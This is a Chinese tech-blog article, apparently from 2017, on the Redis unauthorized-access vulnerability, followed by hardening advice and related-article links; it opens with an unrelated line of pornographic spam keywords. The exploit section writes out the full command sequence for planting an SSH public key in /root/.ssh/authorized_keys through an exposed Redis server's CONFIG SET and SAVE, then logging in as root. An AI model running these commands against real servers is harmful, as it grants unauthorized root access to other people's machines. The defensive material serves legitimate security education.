欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

關于Redis未授權訪問漏洞利用的介紹與修復建議

 更新時間:2017年07月16日 09:50:29   作者:burlin  
Redis是一個開源的使用ANSI C語言編寫、支持網(wǎng)絡、可基于內(nèi)存亦可持久化的日志型、Key-Value數(shù)據(jù)庫,并提供多種語言的API,下面這篇文章主要給大家介紹了關于Redis未授權訪問漏洞利用的介紹和修復建議,文中介紹的非常詳細,需要的朋友可以參考下。

前言

本文主要給大家介紹了關于Redis未授權訪問漏洞利用的相關內(nèi)容,文中對該漏洞進行了詳細,并給出了相對應的修復/安全建議,下面話不多說了,來一起看看詳細的介紹吧。

一、漏洞介紹

Redis 默認情況下,會綁定在 0.0.0.0:6379,這樣將會將 Redis 服務暴露到公網(wǎng)上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問 Redis 以及讀取 Redis 的數(shù)據(jù)。攻擊者在未授權訪問 Redis 的情況下可以利用 Redis 的相關方法,可以成功在 Redis 服務器上寫入公鑰,進而可以使用對應私鑰直接登錄目標服務器。

漏洞描述

部分 Redis 綁定在 0.0.0.0:6379,并且沒有開啟認證(這是Redis 的默認配置),如果沒有進行采用相關的策略,比如添加防火墻規(guī)則避免其他非信任來源 ip 訪問等,將會導致 Redis 服務直接暴露在公網(wǎng)上,導致其他用戶可以直接在非授權情況下直接訪問Redis服務并進行相關操作。

利用 Redis 自身的提供的 config 命令,可以進行寫文件操作,攻擊者可以成功將自己的公鑰寫入目標服務器的 /root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接使用對應的私鑰登錄目標服務器。

二、漏洞利用

首先在本地生產(chǎn)公私鑰文件:

$ ssh-keygen –t rsa

然后將公鑰寫入 foo.txt 文件

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

連接 Redis 寫入文件

$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config set dir /root/.ssh/
OK
$ 192.168.1.11:6379> config get dir
1) "dir"
2) "/root/.ssh"
$ 192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.11:6379> save
OK

這里講解下,這里設定了crackit的鍵值為公鑰,并通過redis命令變更Redis DB 文件及存放地點為默認root用戶SSH key存放文件,并將鍵值重定向追加到遠程文件authorized_keys的末尾,也就上傳了公鑰。

這樣就可以成功的將自己的公鑰寫入 /root/.ssh 文件夾的 authotrized_keys 文件里,然后攻擊者直接執(zhí)行:

$ ssh –i id_rsa root@192.168.1.11

可遠程利用自己的私鑰登錄該服務器。

剛剛我們提到公鑰登錄和Redis持久化存放數(shù)據(jù)操作,這里簡單講下原理

詳細講解ssh登錄–公鑰登錄

SSH提供了公鑰登錄,可以省去輸入密碼的步驟。

所謂"公鑰登錄",原理很簡單,就是用戶將自己的公鑰儲存在遠程主機上。登錄的時候,遠程主機會向用戶發(fā)送一段隨機字符串,用戶用自己的私鑰加密后,再發(fā)回來。遠程主機用事先儲存的公鑰進行解密,如果成功,就證明用戶是可信的,直接允許登錄shell,不再要求密碼。

這種方法要求用戶必須提供自己的公鑰。如果沒有現(xiàn)成的,可以直接用ssh-keygen生成一個:

$ ssh-keygen

運行上面的命令以后,系統(tǒng)會出現(xiàn)一系列提示,可以一路回車。其中有一個問題是,要不要對私鑰設置口令(passphrase),如果擔心私鑰的安全,這里可以設置一個。

運行結束以后,在$HOME/.ssh/目錄下,會新生成兩個文件:id_rsa.pub和id_rsa。前者是你的公鑰,后者是你的私鑰。

通常這時再輸入下面的命令,將公鑰傳送到遠程主機host上面:

$ ssh-copy-id user@host

authorized_keys文件,遠程主機將用戶的公鑰,保存在登錄后的用戶主目錄的$HOME/.ssh/authorized_keys文件中。公鑰就是一段字符串,只要把它追加在authorized_keys文件的末尾就行了。

詳細相關的Redis持久化命令

Redis支持2種持久化策略:snapshot方式和commandlog方式,前者通過將當前內(nèi)存數(shù)據(jù)快照周期性寫入RDB文件來實現(xiàn);后者通過在log中記錄Redis進程收到的寫操作來實現(xiàn),下次Redis重啟時,回放commandlog來恢復數(shù)據(jù)狀態(tài)。

這里使用RDB文件寫入SSH key文件,需要設置以下兩個 RDB相關配置

dbfilename

指定RDB文件名,默認為dump.rdb

dir

指定RDB文件存放目錄的路徑,若包含多級路徑,則相關父路徑需事先mkdir出來,否則啟動失敗。

set(key, value):給數(shù)據(jù)庫中名稱為key的string賦予值value

最后Client使用save命令通知redis做一次快照持久化

修復建議/安全建議

1.禁止一些高危命令

修改 redis.conf 文件,添加

rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""

來禁用遠程修改 DB 文件地址

2.以低權限運行 Redis 服務

為 Redis 服務創(chuàng)建單獨的用戶和家目錄,并且配置禁止登陸

$ groupadd -r redis && useradd -r -g redis redis

3.為 Redis 添加密碼驗證

修改 redis.conf 文件,添加

requirepass mypassword

4.禁止外網(wǎng)訪問 Redis

修改 redis.conf 文件,添加或修改,使得 Redis 服務只在當前主機可用

bind 127.0.0.1

5.保證 authorized_keys 文件的安全

為了保證安全,您應該阻止其他用戶添加新的公鑰。

將 authorized_keys 的權限設置為對擁有者只讀,其他用戶沒有任何權限:

$ chmod 400 ~/.ssh/authorized_keys

為保證 authorized_keys 的權限不會被改掉,您還需要設置該文件的 immutable 位權限:

# chattr +i ~/.ssh/authorized_keys

然而,用戶還可以重命名 ~/.ssh,然后新建新的 ~/.ssh 目錄和 authorized_keys 文件。要避免這種情況,需要設置 ~./ssh 的 immutable 位權限:

# chattr +i ~/.ssh

注意: 如果需要添加新的公鑰,需要移除 authorized_keys 的 immutable 位權限。然后,添加好新的公鑰之后,按照上述步驟重新加上 immutable 位權限。

總結

以上就是這篇文章的全部內(nèi)容,希望本文的內(nèi)容對大家的學習或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

相關文章

  • Redis keys命令的具體使用

    Redis keys命令的具體使用

    本文主要介紹了Redis keys命令的具體使用,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2022-06-06
  • 在Centos?8.0中安裝Redis服務器的教程詳解

    在Centos?8.0中安裝Redis服務器的教程詳解

    由于考慮到linux服務器的性能,所以經(jīng)常需要把一些中間件安裝在linux服務上,今天通過本文給大家介紹下在Centos?8.0中安裝Redis服務器的詳細過程,感興趣的朋友一起看看吧
    2022-03-03
  • redis中刪除操作命令

    redis中刪除操作命令

    這篇文章主要介紹了redis中刪除操作命令,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2023-02-02
  • Python利用redis限制用戶重復刷新帶來的數(shù)據(jù)問題

    Python利用redis限制用戶重復刷新帶來的數(shù)據(jù)問題

    在網(wǎng)站開發(fā)中,我們經(jīng)常會遇到需要控制用戶重復刷新頁面的情況,本文就來介紹了Python利用redis限制用戶重復刷新帶來的數(shù)據(jù)問題,感興趣的可以了解一下
    2024-03-03
  • 深入解析RedisJSON之如何在Redis中直接處理JSON數(shù)據(jù)

    深入解析RedisJSON之如何在Redis中直接處理JSON數(shù)據(jù)

    JSON已經(jīng)成為現(xiàn)代應用程序之間數(shù)據(jù)傳輸?shù)耐ㄓ酶袷?然而,傳統(tǒng)的關系型數(shù)據(jù)庫在處理JSON數(shù)據(jù)時可能會遇到性能瓶頸,本文將詳細介紹RedisJSON的工作原理、關鍵操作、性能優(yōu)勢以及使用場景,感興趣的朋友一起看看吧
    2024-05-05
  • Redis底層數(shù)據(jù)結構之dict、ziplist、quicklist詳解

    Redis底層數(shù)據(jù)結構之dict、ziplist、quicklist詳解

    本文給大家詳細介紹了Redis的底層數(shù)據(jù)結構:dict、ziplist、quicklist的相關知識,本文給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友參考下吧
    2021-09-09
  • 通俗易懂的Redis數(shù)據(jù)結構基礎教程(入門)

    通俗易懂的Redis數(shù)據(jù)結構基礎教程(入門)

    這篇文章主要介紹了通俗易懂的Redis數(shù)據(jù)結構基礎教程,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2021-03-03
  • Redis簡介

    Redis簡介

    Redis是一個開源,高級的鍵值存儲和一個適用的解決方案,用于構建高性能,可擴展的Web應用程序。關于redis的相關知識大家可以通過本教程學習
    2017-05-05
  • 命令行清除Redis緩存的實現(xiàn)

    命令行清除Redis緩存的實現(xiàn)

    本文主要介紹了命令行清除Redis緩存的實現(xiàn),文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2023-04-04
  • Linux下redis的安裝與使用圖文教程

    Linux下redis的安裝與使用圖文教程

    這篇文章主要介紹了Linux下redis的安裝與使用,結合圖文形式分析了Linux環(huán)境下redis的下載、編譯、安裝、部署、訪問等相關操作技巧,需要的朋友可以參考下
    2019-08-08

最新評論